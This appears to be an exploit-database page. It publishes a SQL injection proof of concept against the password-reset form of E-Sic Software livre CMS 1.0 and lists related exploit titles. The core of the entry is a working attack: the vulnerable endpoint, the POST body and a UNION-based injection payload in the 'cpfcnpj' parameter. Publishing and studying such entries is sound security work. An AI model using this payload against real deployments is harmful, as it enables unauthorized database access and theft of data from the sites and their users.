Menu

Search for hundreds of thousands of exploits

"E-Sic Software livre CMS - 'cpfcnpj' SQL Injection"

Author

Exploit author

"Elber Tavares"

Platform

Exploit platform

php

Release date

Exploit published date

2017-10-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------

Url: http://vulnerablesite/esic/reset/

POST: cpfcnpj=test&btsub=Enviar

Parameter: cpfcnpj (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
    ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-03-02 "Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)" webapps hardware "Elber Tavares"
2020-03-02 "TP LINK TL-WR849N - Remote Code Execution" webapps hardware "Elber Tavares"
2020-03-02 "TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)" webapps hardware "Elber Tavares"
2017-10-12 "E-Sic Software livre CMS - 'cpfcnpj' SQL Injection" webapps php "Elber Tavares"
2017-10-12 "E-Sic Software livre CMS - 'f' SQL Injection" webapps php "Elber Tavares"
2017-10-12 "E-Sic Software livre CMS - Autentication Bypass" webapps php "Elber Tavares"
2017-10-12 "E-Sic Software livre CMS - Cross Site Scripting" webapps php "Elber Tavares"
2017-09-28 "Roteador Wireless Intelbras WRN150 - Autentication Bypass" webapps hardware "Elber Tavares"
2017-09-07 "Roteador Wireless Intelbras WRN150 - Cross-Site Scripting" webapps hardware "Elber Tavares"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.